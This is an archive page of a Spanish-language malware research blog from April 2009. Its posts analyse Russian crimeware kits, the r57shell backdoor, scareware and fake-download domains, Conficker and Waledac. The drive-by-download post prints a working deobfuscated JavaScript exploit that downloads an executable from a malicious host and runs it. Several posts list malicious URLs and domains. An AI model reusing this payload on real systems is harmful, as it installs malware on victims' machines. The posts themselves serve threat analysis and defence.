Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

jueves, 30 de abril de 2009

Compendio mensual de información. Abril 2009

Pistus Malware Intelligence Blog
22.04.09 Adrenalin botnet: zona de comando. El crimeware ruso marca la tendencia
18.04.09 Scripting attack II. Conjunción de crimeware para obtener mayor volumen de infección
18.04.09 Chamaleon botnet. Administración y monitoreo de descargas

15.04.09 Scripting attack. Explotación múltiple de vulnerabilidades
13.04.09 Continúa la importante y masiva campaña scareware
12.04.09 YES Exploit System. Otro crimeware made in Rusia
10.04.09 Falsas páginas utilizadas como vector de propagación de malware
09.04.09 Drive-by-Download y Drive-by-Update como parte del proceso de infección
07.04.09 Waledac. Seguimiento detallado de una amenaza latente
04.04.09 Conficker IV. Dominios relacionados... y controversiales
03.04.09 Conficker III. Campaña de propagación de falsas herramientas de limpieza
02.04.09 Conficker II. Infección distribuida del gusano mediático
01.04.09 Conficker. Cuando lo mediático se hace eco de todos...


EvilFingers Blog

20.04.09 Scripting attack II. Conjunction of crimeware for increased infection
19.04.09 Continuing the important and massive campaign scareware
16.04.09 Scripting attack. Exploitation of multiple vulnerabilities
14.04.09 YES Exploit System. Another crimeware made in Russia
11.04.09 Fake page used as a vector for spreading malware
08.04.09 Waledac. Follow-up of a latent threat
04.04.09 Conficker IV. Related domains ... and controversial
03.04.09 Conficker III. Campaign of spreading false cleaning tools
02.04.09 Conficker II. Worm infection distributed
01.04.09
Conficker. When the media echoed all neglecting the problem of substance

ESET Latinoamérica Blog
27.04.09 Botnets. Una breve mirada al interior de ZeuS
21.04.09 Particular estrategia de Ingeniería Social
16.04.09 Bloqueo de puertos USB con ESET NOD32
15.04.09 Listado de programas de seguridad falsos V
08.04.09 Informe sobre el troyano Waledac
07.04.09 Notificación sobre actualizaciones en ESET NOD32 v4
01.04.09 Reporte de amenazas de Marzo

Información relacionada

Compendio mensual de información. Marzo 2009
Compendio mensual de información. Febrero 2009
Compendio mensual de información. Enero 2009


# pistus

Ver más

miércoles, 22 de abril de 2009

Adrenaline botnet: zona de comando. El crimeware ruso marca la tendencia

A los diferentes paquetes crimeware que de manera breve hemos tratado en alguna oportunidad, se le suma Adrenaline.

Otro crimeware de origen Ruso de sólo unos pocos meses de vida y que no pretende ser mejor ni peor que otros de su familia, ni tampoco, casi seguro, le disgusta "trabajar" en conjunto con otros crimeware :-)

Aunque esta última frase parezca una publicidad de venta, en realidad refleja un poco la situación actual de la diseminación de malware y empleo de crimeware. Cosa que pudimos comprobar a través de Scripting attack II.

Y decimos que Adrenaline no es muy diferente a otros porque también permite diseminar código dañino a través de script ofuscados escondiendo exploits, inyección de código dañino en el código fuente de páginas web, empleo de Drive-by-Download, robo de información a través de sniffer, administración y control remoto vía web, etc.

Sin embargo, posee algunas características que lo diferencian de otros, quizás de ello se desprenda su elevado costo también en comparación con sus competidores (aproximadamente USD 3500), como:
  • recolección de certificados digitales,
  • diferentes metodologías de inyección de código viral,
  • hace uso de pharming local para lograr redireccionamientos obligados sin que el usuario lo perciba,
  • implementa keylogger con captura de pantalla,
  • implementa técnicas de evasión para evitar ser detectado por herramientas de seguridad como firewalls y antirootkits,
  • módulos específicos para la limpieza de huellas,
  • cifrado de la información que recolecta.

Entre otras cosas más, posee otra característica llamativa que no es novedosa pero sí un tanto particular: elimina malware de la competencia :-)

Como se aprecia claramente, la tendencia marca que Internet es el máximo exponente en plataformas de ataque, sobre todo a través de aplicaciones crimeware como las que venimos comentando habitualmente en este blog.

Aún así, hay un par de preguntas que dan vueltas en mi cabeza, y que básicamente se traducen en: ¿por qué cada vez hay más paquetes de automatización crimeware? y ¿por qué el elevado costo?

Intentando analizarlo un poquito, quizás las respuestas las tenemos frente a los ojos en la vida cotidiana de quienes nos dedicamos al campo de la seguridad. La respuesta a la primera pregunta, puede tener una perspectiva tendenciosa canalizada en el dinero; es decir, evidentemente, la información posee la catalogación de máximo valor (por mínima que sea y sin importar su clasificación) y teniendo en cuenta eso, los delincuentes informáticos buscan obtener dinero con esa información, transformándose todo el mundo del malware en un gran negocio, altamente redituable y difícil de quebrar.

Por otro lado, todo esto supone un problema asociado que no se puede obviar que pasa por el hecho de que el crimeware sea ofrecido a medida y con soporte técnico 24x7, lo que implica que cada vez más usuarios con mente delictiva se postulen como aspirantes en la búsqueda de obtener el provecho económico que el crimeware, en el concepto más amplio de su palabra, supone como organización delictiva a través de Internet.

En torno a la segunda, quizás la respuesta se encuentre directamente relacionada en que el costo que supone la adquisición de un Kit de este estilo, puede ser recuperado en muy poco tiempo; sobre todo, teniendo presente que las botnets que se administran a través de estos aplicativos, suelen ser alquiladas a otros botmasters, a spammers o a otros personajes de este oscuro submundo que, como lo mencioné en otro post, me recuerda a los relatos de William Gibson en Neuromante.

Información relacionada
Chamaleon botnet. Administración y monitoreo de descargas
YES Exploit System. Otro crimeware made in Rusia
Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades
Zeus Botnet. Masiva propagación de su troyano. Segunda parte
Barracuda Bot. Botnet activamente explotada
Creación Online de malware polimórfico basado en PoisonIvy


# pistus

Ver más

sábado, 18 de abril de 2009

Scripting attack II. Conjunción de crimeware para obtener mayor volumen de infección

Otra técnica ampliamente utilizada por los delincuentes informáticos para atacar equipos vía web a través de scripting es la inyección de las instrucciones maliciosas en el código de la página.

En este caso, una página web alojada en un servidor vulnerado es utilizada como vector para la propagación de malware por intermedio de la explotación de vulnerabilidades en equipos desprotegidos. Algunas de las páginas empleadas son:

http://team-sleep.by .ru/default2 .html
http://team-sleep.by .ru/demo .html
http://team-sleep.by .ru/disco .html

http://team-sleep.by .ru/downloads .html
http://team-sleep.by .ru/enter .html
http://team-sleep.by .ru/gold .html
http://team-sleep.by .ru/googleanalyticsru .html
http://team-sleep.by .ru/guest .html
http://team-sleep.by .ru/guestbook .html
http://team-sleep.by .ru/media .html
http://team-sleep.by .ru/menu .html
http://team-sleep.by .ru/news .html
http://team-sleep.by .ru/photo2 .html
http://team-sleep.by .ru/poem .html
http://team-sleep.by .ru/press_reviews .html
http://team-sleep.by .ru/team-sleep .html
http://team-sleep.by .ru/wallpapers .html
http://team-sleep.by .ru/gmail .php
http://team-sleep.by .ru/haitou .php
http://team-sleep.by .ru/in .php
http://team-sleep.by .ru/xxx .php
http://team-sleep.by .ru/photo/team .html
http://team-sleep.by .ru/photo/wallz .html
http://team-sleep.by .ru/photo/live/index2 .html
http://team-sleep.by .ru/photo/live/imagepages/image1 .html
http://team-sleep.by .ru/photo/members/imagepages/image1 .html
http://team-sleep.by .ru/photo/team/imagepages/image1 .html


La lista es larga (98 páginas de un mismo sitio). Sin embargo, a través del gráfico quedan todas representadas.

Cada una de estas direcciones web son diseminadas a través de canales como el correo electrónico o clientes de mensajería instantánea empleando alguna estrategia de Ingeniería Social, y alojan varios script ofuscados que contienen diferentes exploits.

Al desofuscar los scripts, nos encontramos con el empleo de etiquetas iframe que redireccionan a otras URL's como:
  • http://5rublei .com/unique/index .php
  • http://tochtonenado .com/yes/index .php
Un punto sumamente interesante en relación al crimeware, nos remite directamente al concepto mismo de vulnerabilidad; es decir, el crimeware no queda exento a debilidades por fallos de diseño en su código, lo cual nos permite profundizar un poco más el conocimiento el crimeware violando su integridad.

Tal cual lo ven en la imagen, resulta que se trata del empleo en conjunto de dos conocidos crimeware, Unique Sploits Pack y YES Exploit System.

Esto demuestra que los delincuentes informáticos buscan constantemente encontrar una manera rápida y sencilla, cuanto más automatizada mejor, diferentes formas de ataque que permita aumentar las ganancias.

De esta forma, la labor "profesional" que se esconde detrás de estas actividades maliciosas donde el malware es el principal actor buscando continuamente ampliar el abanico de infecciones, los botmaster logran realizar actividades dañinas con un mayor caudal de distribución.

Información relacionada
Scripting attack. Explotación múltiple de vulnerabilidades
Explotación de vulnerabilidades a través de archivos PDF
Explotando vulnerabilidades a través de SWF
Explotación de vulnerabilidades a través de JS
Explotación masiva de vulnerabilidades a través de servidores fantasmas
Análisis esquemático de un ataque de malware basado en web
LuckySploit, la mano derecha de Zeus
Anatomía del exploit MS08-078 by FireEye


# pistus

Ver más

Chamaleon botnet. Administración y monitoreo de descargas

La oferta de crimeware por parte de la superpotencia energética es muy amplia. La mayoría de los Kits de automatización de infecciones y administración vía web, son diseñados en Rusia y la propagación de malware a través de ellas, se exportan a nivel global.

Chamaleon
es otro crimeware que, aunque con menos funcionalidades que otros Kits, sigue la tendencia de poder monitorear una serie de datos estadísticos por intermedio de un panel de control y administración.

A través de un sencillo menú, este crimeware permite administrar diferentes cuestiones que desde el punto de vista estadístico, los delincuentes informáticos necesitan para tener una idea global de qué tipo de exploits utilizar. Por ejemplo, en la siguiente captura se aprecia la cantidad de navegadores que accedieron a la descarga de malware y sistemas operativos afectados.

Incluso, una detallada discriminación por países de nodos comprometidos a través de un módulo GeoIP que forma parte del Kit.

El crimeware, utiliza varios scripts destinados a explotar vulnerabilidades en los navegadores y sistemas operativos.

A través de los cuales descarga los siguientes archivos:
  • test.pdf - 14/40 (35.00%) (MD5: 9c1c623fe3a5dfbe2e9e9739386510e1)
  • 22.pdf - 12/40 (30.00%) (MD5: 9b7ecfe7f925d06903f7e303a3595c02)
  • file2.exe - 28/40 (70.00%) (MD5: 221e923fcab13951da7b3e652f3a8bab)
Todos, códigos maliciosos que actualmente presentan un bajo índice de detección por parte de las compañías antivirus.

Información relacionada

YES Exploit System. Otro crimeware made in Rusia

Barracuda Bot. Botnet activamente explotada

Los precios del crimeware Ruso

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades


# pistus

Ver más

miércoles, 15 de abril de 2009

Scripting attack. Explotación múltiple de vulnerabilidades

La ejecución de códigos maliciosos a través de ataques scripting forman parte del folklore actual de los códigos maliciosos. Sin embargo, detrás de toda esta batería de métodos de infección, se encuentran involucradas aplicaciones diseñadas íntegramente para cometer este tipo actos dañinos.

Por lo general, se trata de aplicativos crimeware como zeus, barracuda, chamaleon, YES, etc., o shells remotas escritas en PHP, como en este caso, la conocida r57shell.


Existen muchas aplicaciones de este estilo (c99shell, c100shell, locus, netshell, etc.) que son implantadas, generalmente, en servidores vulnerados a través de RFI (Remote File Inclusion - Inclusión Remota de Archivos) y utilizadas para realizar massive-defacement; es decir, desfiguración masiva de páginas web.

Sin embargo, si bien es habitual que el fin sea este, también son plenamente empleadas para ataques vía web a través de códigos maliciosos como DDoS, SQL Injection y reclutamiento de computadoras zombis, entre otros.

Como podemos apreciar a través de esta segunda captura, las funcionalidades que ofrece r57shell son muchísimas, y no responden a una condición casual ni trivial, ya que la intención es poder controlar completamente el servidor donde se haya implantado. Es decir, se trata de un backdoor a partir del cual un atacante toma control total del servidor, y de cada uno de los nodos alojados en el mismo.

En este caso, la shell en PHP estaba siendo utilizada para propagar malware a través de la explotación de las siguientes vulnerabilidades:
Todos los exploits para estas vulnerabilidades se encuentran en un solo script cuya apariencia es similar al siguiente, que dicho sea de paso, la captura ha sido cortada.

Al desofuscar el script, se obtienen las siguientes URL's:
  • http://vsedlysna.ru/img/site/2/load.php?id=83 --> Descarga el archivo load.exe (MD5: 22027b5c4394c7095c4310e2ec605808) enpaquetado con ASPack v2.12.
  • http://vsedlysna.ru/img/site/2/pdf.php?id=83 --> Descarga el archivo 9040.pdf (MD5: 3b9e76642e96f3626cf25b7f3f9d6c3a) cuyo nombre de archivo es un valor aleatorio que cambia en cada descarga adopatando nombres como 8795.pdf, 7436.pdf, 6100.pdf, etc.
  • http://vsedlysna.ru/img/site/2/pdf.php?id=83&vis=1 --> Descarga otro archivo con extensión pdf cuyo nombre varía en cada acceso siguiendo la misma metodología que el caso anterior. En este caso, el archivo se llama 4099.pdf (MD5: 5caf548ff3e6ae0c9101ae647757a099).
Información relacionada
YES Exploit System. Otro crimeware made in Rusia

Zeus Botnet. Masiva propagación de su troyano. Segunda parte
Barracuda Bot. Botnet activamente explotada

Los precios del crimeware Ruso

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades


# pistus

Ver más

lunes, 13 de abril de 2009

Continúa la importante y masiva campaña scareware

Durante el pasado mes, había escrito algo sobre una importante campaña de propagación de malware del tipo scareware, o rogue, empleando como estrategia de engaño páginas que simulan ser el explorador de Windows, tanto en idioma inglés como en español.

Un mes después, la campaña se sigue masificando explotando una importante cantidad de dominios, en su mayoría, de origen chino.

Sin embargo, sus creadores y diseminadores canalizan todos sus esfuerzos no sólo en obtener dominios de manera rápida a través del registro en hosting gratuitos o vulnerados, sino que también en evitar la detección por parte de compañías antivirus sin importar el ciclo de vida del instalador, ya que prácticamente es modificado a diario.


Algunos de los binarios y dominios involucrados son:

ia-scannerpro .com
scanplus4 .info
newscan4 .info
anytoplikedsite .com

topsecurity4you .com

cleanyourpcspace .com

fullsecurityshield .com

xw.dayindigo.cn/in .cgi?9

onlinedetect.com/in .cgi?6

greatsecurityshield .com

easycheckpoisonpro .cn/?

examineillnesslive .cn

easydefenseonline .cn

bigdefense2u .cn

vlo.bookadorable.cn/in .cgi?9

davidkramm.net/core/admin/bald-pussy-photo/red-pepper-humus-recipe .html

1000league .com/in .cgi?9

goscanstep .com/?uid=12724

in4ck .com/cki.php?uid=12724

data6scan .com/?uid=12724

bwgm.schoolh .cn/in.cgi?6
designroots .cn/in.cgi?6
drawingstyle .cn/in.cgi?6

ed.worksean .cn/in.cgi?6

housevisual .cn/in.cgi?6

kvk.housevisual .cn/in.cgi?6

oceandealer .cn/in.cgi?6

pub.oceandealer .cn/in.cgi?6

peopleopera .cn/in.cgi?6

rainfinish .cn/in.cgi?6

schoolh .cn/in.cgi?6

vitamingood .cn/in.cgi?6

websiteflower .cn/in.cgi?6

worksean .cn/in.cgi?6

xfln.housevisual .cn/in.cgi?6

yz.worksean .cn/in.cgi?6

securedantivirusonlinescanner .com

thankyou4check .com

antivirusonlineproscan .com

antivirus-pro-live-scan .com
antivirusonlineproscanner .com
allsoftwarepayments .com

powerdownloadserver .com

securitysoftwarecheck .com

wwwsafetyread .com

scan7live .com

traffbox .com/in.cgi?6

soft-traffic .com

rd-point .net/go.php?id=1188

ddors .info/in.cgi?10

truconv .com/?a=125&s=gen-asw

yourfriskviruspro .cn/?wm=70127&l=1

addedantivirusstore .com

myplusantiviruspro .com

realantivirusplus .com

yourguardstore .cn

addedantiviruslive .com

japanhostnet .com/in.cgi?mainy8com


Si bien esta lista es bastante generosa, en comparación con la cantidad de dominios utilizados para la campaña scareware representa tan solo un mínimo porcentaje
.

Por otro lado, más allá de la campaña en sí mismo, otro factor que preocupa es la cada vez mayor eficacia de este tipo de códigos maliciosos.

Información relacionada

Campaña de infección scareware a través de falso explorador de Windows
Una recorrida por los últimos scareware V


# pistus

Ver más

domingo, 12 de abril de 2009

YES Exploit System. Otro crimeware made in Rusia

Los conjuntos de aplicativos utilizados para automatizar diferentes tipos de ataques vía web (crimeware), se han transformado en una corriente y peligrosa tendencia que manifiesta la clara inclinación y demanda delictiva de automatizar los procesos maliciosos.

Ya he dado cuenta de varios de ellos de los cuales Rusia, es el paraíso creativo para el desarrollo de crimeware. Incluso, del soporte técnico, en muchos casos, y de la creación de paquetes crimeware “a medida” y listos para implementar necesitando, únicamente, saber modificar la contraseña por defecto del panel de administración vía web.


Lo que supone un condimento extra de proliferación de actos maliciosos ejecutados por personas que no conocen a fondo el tipo de programa que están utilizando. Sólo lo adquieren por una módico costo listo para comenzar a diseminar instrucciones maliciosas a granel.


YES Exploit System
, es otro de los paquetes crimeware que cumple con estas características de fácil implementación y uso.

La nueva versión de reciente aparición tiene un costo de 700 USD en el mercado negro de Rusia e incorpora una serie de “mejoras” funciones maliciosas con respecto a la versión anterior, además de contar con actualizaciones gratuitas de por vida.

Entre las nuevas características que incorpora el crimeware se encuentran:
  • Nuevos exploits.
  • La posibilidad de obtener información estadística mínima a través de un nuevo gestor estadístico que no reemplaza al completo sino que lo complementa.
  • Notificación de otras infecciones que no se hayan producido a través de YES Exploit System en el equipo víctima.
  • Actualización de la base de datos GeoIP.
  • Capacidad de descargar varios archivos desde la misma página Por ejemplo, desde index.php se pueden descargar abc.exe, def.exe, ghi.exe, etcétera.
  • Administración de la descarga de archivos a través del mismo panel de control y no desde FTP.
  • Optimización del código PHP.
  • Eliminación de las estadísticas guest y del checker FTP.
  • Control de archivos descargados a través del panel de administración.
  • Optimización general del panel de control para obtener un mejor rendimiento en la carga del mismo.
  • Se agregó un nuevo nivel de cifrado del código iframe.
  • Cifrado de los binarios para evitar la detección por parte de las compañías AV.
Una nueva alternativa de administración centralizada y automatización de acciones delictivas utilizando Internet como base de ataques.

Información relacionada

Zeus Botnet. Masiva propagación de su troyano. Segunda parte

Barracuda Bot. Botnet activamente explotada

Los precios del crimeware Ruso

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades


# pistus

Ver más

viernes, 10 de abril de 2009

Falsas páginas utilizadas como vector de propagación de malware

Las estrategias de engaño a través de Ingeniería Social se encuentran a la orden del día en Internet y representan el comienzo de potenciales riesgos de seguridad; siendo, la clonación o la presentación de falsas páginas web, uno de los vectores más explotados para romper la seguridad del factor humano.

Algunas son más complejas que otras, y algunas más llamativas o mejor elaboradas que otras; sin embargo, por más trivial que sea el engaño, su efectividad irá en relación directa con el nivel de educación que, en materia de seguridad, tenga quien accede a la trampa del delincuente informático.


En definitiva, la siguiente captura es un ejemplo con el que recientemente me he encontrado. Se trata de una falsa página que descarga un archivo binario llamado
surprise.exe (MD5: 9bd6a9cba442a88839a185eb47c2008c) que es una variante del código maliciosos Virtumonde, también llamado Monde o Vundo.

Para que se visualice un componente de cotejo, la próxima es una captura de la página real de sendspace.

Una estrategia muy empleada a través de estas técnicas, es el uso de nombres de dominios similares al real; es decir, la página falsa es http://sendspace-us .com mientras que la real es http://sendspace.com. Esto constituye, en este caso, el principio de una potencial infección.

Otro dato más que interesante es que, el dominio que representa la falsa página se encuentra en la dirección IP
196.2.198.241, cuyo sistema autónomo es AS33777 de EgyptNetwork.

A su vez, esta dirección IP representa varios dominios más.

cd-soft.net
darthvader777.com

egns.vg
good1soft.com

greatlovingcore.net

kassperskylabs.cn

kentty.net

searchingforthevhostipadres.com

sendspace-us.com

sendspace.com.bz

throbilskirnir.com

thronofodin.com

ustechservic.com.cn

www.cd-soft.net

www.charming-woman.com

www.darthvader777.com

www.dx-software.com

www.egns.vg

www.good1soft.com

www.greatlovingcore.net

www.icm-com-services.com

www.sendspace.com.bz

www.throbilskirnir.com

www.thronofodin.com

www.ustechservic.com.cn


Como podemos apreciar, incluso uno de los dominios de la lista es kassperskylabs .cn, muy similar al de la conocida empresa de seguridad antivirus.


Información relacionada
Phishing Kit In-the-Wild para clonación de sitios web, versión 2
Phishing Kit In-the-Wild para clonación de sitios web


# pistus

Ver más

jueves, 9 de abril de 2009

Drive-by-Download y Drive-by-Update como parte del proceso de infección

Sin lugar a dudas, los delincuentes informáticos han encontrado en Internet una excelente plataforma de ataque de la cual aprovechan, no sólo las capacidades de diseminación de malware de manera casi instantánea a través de diferentes tecnologías, sino que también hacen abuso de las debilidades que presenta el factor humano; la mayoría de los casos, por falta de un adecuado nivel (mínimo) de educación en materia de seguridad en general y sobre códigos maliciosos en particular.

Diferentes técnicas de ataque posibilitan, si se cumplen determinadas condiciones en el equipo víctima, que las instrucciones cada vez más invasivas del malware, infecten los sistemas con la sola acción de establecer una conexión con Internet.


El siguiente ejemplo, representa uno de los ataques más comunes a través de Internet,
Drive-by-Download.

En el preciso momento en que el usuario accede a la dirección web, en segundo plano se ejecutan instrucciones maliciosas a través de un script ofuscado que, desofuscado, muestra lo siguiente:
var ailian, zhan, cmdss;
ailian = "http://pxciiruurw .cn/new/load .exe";
zhan = "run.exe";
try {
var ado = (document.createElement("object"));
var d = 1;
ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e = 1;
var xml = ado.CreateObject("Microsoft.XMLHTTP", "");
var f = 1;
var ln = "Ado";
var lzn = "db.St";
var an = "ream";
var g = 1;
var as = ado.createobject(ln + lzn + an, "");
var h = 1;
xml.Open("GET", ailian, 0);
xml.Send();
as.type = 1;
var n = 1;
as.open();
as.write(xml.responseBody);
as.savetofile(zhan, 2);
as.close();
var shell = ado.createobject("Shell.Application", "");
shell.ShellExecute(zhan, "", "", "open", 0);
}
catch (e){
}
;

Esto significa que el script contiene un exploit, en este caso, que explota una vulnerabilidad en MDAC (Microsoft Data Access Components), y descarga un binario llamado load.exe (MD5: f2e4869924c6468fbc05a146a1a3bd11).

Se trata de un troyano tipo download que intenta establecer conexión con http://ddvrrflabpqcuoaexpwp.cn/2_s_t .php para descargar más malware.


En muchos otros casos, el Drive-by-Download es combinada con otras como el
Drive-by-Update para continuar el proceso de propagación post infección, permitiendo el acceso al sistema de otros códigos maliciosos.

El Drive-by-Update es un proceso malicioso post infección utilizado para controlar las descargas de códigos maliciosos.

En el caso de la vulnerabilidad en MDAC explotada por este malware, la misma data del año 2006. Aún así, a pesar de tener solución a través de un parche de seguridad, es altamente explotada como vector ataque a través de Internet.


Por lo tanto, esto supone un mayor grado de cuidado sobre las páginas que visitamos, y un mejor empleo de las buenas prácticas de seguridad que ayudarán notablemente a la prevención ante potenciales infecciones.


Información relacionada

Explotación masiva de vulnerabilidades a través de servidores fantasmas
Análisis esquemático de un ataque de malware basado en web
Ataque de malware vía Drive-by-Download
Análisis de un ataque de malware basado en web
Drive-by Update para propagación de malware


# pistus

Ver más

martes, 7 de abril de 2009

Waledac. Seguimiento detallado de una amenaza latente

Las noticias controversiales de los últimos días en torno al gusano Conficker, han "tapado" bastante las acciones dañinas de otras amenazas que, por su menor cobertura mediática, no han tenido una significativa publicidad ni demanda por parte de los medios de información, o desinformación en algunos casos. Sin embargo, aún así, siguen aumentando su cobertura de infección. Uno de estos casos es Waledac.

Este troyano, cuya campaña de infección comenzó a gestarse a través de un amplio repertorio de amorosas imágenes y, últimamente falsas noticias sobre explosiones, utilizadas como estrategias de Ingeniería Social, sigue teniendo un alto índice de infección a nivel global. En este sentido, muchos esperamos que en cualquier momento, al estilo Nuwar, modifique nuevamente la estrategia de engaño visual.

Sudosecure viene realizando un excelente trabajo rastreando los pasos de Waledac desde su aparición ofreciendo informes actualizados con datos detallados sobre el estado actual del troyano. De este seguimiento podemos desprender información como por ejemplo, el top 10 de los binarios más descargados y las 10 direcciones IP más utilizadas para descargarlos.

Los 10 países que más propagan Waledac y los 10 dominios más utilizados.

Incluso, el número de direcciones IP propagando el troyano en los últimos 30 días.

Claramente se percibe el grado de propagación a nivel global. Y cada vez que veo cosas por el estilo, me pregunto cuál es el nivel de propagación, en este caso, de Waledac a nivel local (Argentina). Esta información también puede ser desprendida de las estadísticas que se encuentran en sudosecure.

Para clarificar un poco la incógnita, he realizado un sencillo gráfico que muestra la relación de dominios, direcciones IP y ubicación desde la cuál se produce la diseminación de Waledac.

Es decir, cada una de las direcciones IP representa un equipo infectado. El gráfico está realizado en base a los primeros 50 dominios que propagan Waledac desde la Argentina.

En algunos casos notarán que una misma dirección IP es utilizada por varios dominios y viceversa, esto es porque Waledac utiliza mecanismos complejos de propagación como lo son las redes Fast-Flux.

Quizás muchos de nosotros nos olvidemos que Waledac transforma los equipos de usuarios desprevenido en zombis para alimentar, aún más, la importante botnet desde la cual, entre otras cosas, distribuye spam de manera distribuida.

Información relacionada
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín


# pistus

Ver más

sábado, 4 de abril de 2009

Conficker IV. Dominios relacionados... y controversiales

Luego de publicar Conficker III. Campaña de propagación de falsas herramientas de limpieza, tanto en este mismo blog como en el blog de evilfingers, he recibido algunos correos preguntando por qué había publicado nombres de dominios que no guardan relación alguna con lo que se expresa en el post en cuestión; es decir, con falsas herramientas de limpieza.

Sin embargo, y teniendo en cuenta esta situación, resulta necesario aclarar cómo se ha tejido una gran estrategia propagandista para "aprovechar", de manera positiva en algunos casos y negativa en otros, la gran demanda que atrajo la palabra "conficker" como consecuencia de la gran oleada de supersticiones que rondan en torno al gusano.

¿Qué quiero decir con esto?, la situación hizo que la palabra sea utilizada como campaña para atraer más visitas y más publicidad.

La cuestión es que la campaña tuvo dos vertientes bien diferenciadas. Una dada por quienes se encuentran bajo la bandera de la seguridad, donde, con la intención de generar un efecto "imán" al utilizar la palabra "conficker", algunas compañías han adquirido los dominios que en un primer momento habían sido utilizados con fines maliciosos, para redireccionar hacia la descarga de una herramienta de limpieza legítima o información relacionada para combatir la amenaza que supone el gusano.

Por ejemplo, http://www.remove-conficker.org redirecciona a http://www.microsoft.com/protect/computer/viruses/worms/conficker.mspx, o también http://downadup.org que ahora redirecciona a http://www.bdtools.net.

Por otro lado, quienes se encuentran constantemente pensando estrategias de engaño que permitan aumentar sus ganancias a través de diferentes acciones poco éticas, también vieron en la palabra "conficker" una oportunidad.

En consecuencia, comenzaron a aparecer muchos sitios web que, bajo la promesa de ofrecer información sobre la limpieza de conficker o herramientas gratuitas, utilizan la oportunidad para ganar visitas.


La palabra "conficker" es una de las más buscadas en Internet, gracias a la campaña de propaganda global que los medios de información se encargaron de alimentar, por lo tanto, no resulta para nada extraño encontrarse con acciones de este tipo.

Información relacionada
Conficker III. Campaña de propagación de falsas herramientas de limpieza
Conficker II. Infección distribuida del gusano mediático
Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo


# pistus

Ver más

viernes, 3 de abril de 2009

Conficker III. Campaña de propagación de falsas herramientas de limpieza

La gran repercusión que el gusano conficker tuvo a nivel mundial, hizo que no sólo los medios de comunicación se hagan eco de sus actividades, sino que también, estas mismas repercusiones son utilizadas de manera maliciosa para propagar otros tipos de códigos maliciosos.


Algunos sitios ya dieron cuenta de la existencia de páginas web que hacen referencia sobre supuestas herramientas de limpieza para conficker pero que en lugar de ello descargan algún componente malicioso. Es decir, la promesa de erradicar la amenaza del equipo que prometen muchos de estos sitios es falso. Es simplemente una estrategia de engaño para propagar programas tipo scareware o, en algunos casos, troyanos.


Algunos de los dominios de este estilo son:


http://conficker-cleaner .com
http://confickerc .net

http://conficker .com

http://confickerc .org

http://conficker.co .uk
http://confickercvirus .com

http://confickercvirus .info

http://confickercvirus .net

http://confickercvirus .org

http://conficker .de

http://conficker .info

http://conficker .net

http://conficker .org

http://downadup .com

http://downadup.co .uk

http://downadup .de

http://downadup .info

http://downadup .net

http://downadup .org

http://downadupvirus .com

http://downadupworm .com

http://removeconficker .net

http://removeconficker .org

http://stopconficker .com

http://w32downadupc .com


La mayoría de las compañías antivirus han desarrollado una herramienta de limpieza específica para ayudar a combatir al gusano conficker, y algunas otras organizaciones de seguridad también poseen alternativas que ayudan a detectar la amenaza.


Cada uno de estos sitios representa un potencial peligro de infección, por lo tanto hay que evitarlas y/o filtrarlas.


Información relacionada
Conficker II. Infección distribuida del gusano mediático
Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo


# pistus

Ver más

jueves, 2 de abril de 2009

Conficker II. Infección distribuida del gusano mediático

Pasado el "tan esperado día" en que supuestamente conficker arrasaría con todo, son muchas las reflexiones que quedan pululando por la gran red. Muchas compañías de seguridad y profesionales de la materia que pronosticaban una gran ola maliciosa arrastrada por el gusano mediático, se quedaron sin respuestas al ver que terminaba el día y nada pasaba :-)

Es decir, conficker no "salió" al campo con nada nuevo, siguió su carrera de infección como lo viene haciendo desde un principio aumentando el índice de infección que se tenía hasta el momento; con lo cual no quedó otra que decir "eso no significa que en un futuro no muy lejano conficker salga al campo con un batallón más grande". Esto es lógico, cualquier malware puede manifestarse en cualquier momento vaya uno a saber con qué.


Si bien no se pone en tela de juicio que conficker es un peligroso código malicioso, lo sucedido hasta el momento demuestra la inteligencia de su creador (o sus creadores) en la planificación no sólo de la estrategia de diseminación sino que también en la estrategia de
Propaganda, Ingeniería Social y Acción Psicológica que ejerció a través de los medios de comunicación de todo el mundo, tan solo con implantar un rumor.

Tampoco se cuestiona que ha logrado un altísimo índice de infección descubriendo, como lo he comentado en el anterior post, lo inmaduro que todavía se encuentran algunas cuestiones de seguridad, tanto a nivel hogareño como, más preocupante aún, a nivel corporativo.


En relación al nivel de infección de conficker, estaba leyendo un breve y muy interesante informe en
Conficker Working Group llamado Infection Distribution, en el cual se muestra a través de mapas, los índices de infección del gusano a nivel global.

Infecciones a nivel mundial
Infecciones en Estados Unidos
Infecciones en Europa
Infecciones en Australia
Infecciones en Indonesia y Malasia
Según Conficker Working Group, cada uno de los mapas fueron generados a partir de todas las infecciones de conficker producidas desde el principio de su existencia, lo que suma aproximadamente un total de 35 millones de IP's.

Si bien los mapas no expresan un número exacto de infecciones, dejan una idea clara de la distribución de infecciones que logró hasta el momento conficker y las zonas más afectadas por el mismo.


Información relacionada

Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo


# pistus

Ver más

miércoles, 1 de abril de 2009

Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo

Conficker no es un código malicioso (gusano) diferente a muchos otros que han existido, y que continuarán apareciendo, y que existen en la actualidad; sin embargo, en poco tiempo se llevó la atención de todos los medios de información a nivel mundial, incluso, muchos de ellos, rozando de manera muy fina la línea que divide la seriedad de atender un tema tan preocupante como lo son las infecciones, y el amarillismo del caso, jugando con eso de "si esta en boca de todos vende, sigamos hablando de conficker".

Ya con casi seis meses de existencia, es cierto!! :-), está en boca de todos con eso de la "sorpresa" que tiene preparado para el día de hoy, 1 de Abril.


Si bien es verdad que en poco tiempo conficker logro un alto porcentaje de infección a nivel global, y más preocupante aún a nivel local, también es cierto que simplemente queda reflejada la falta de madurez en torno a la gestión de seguridad.


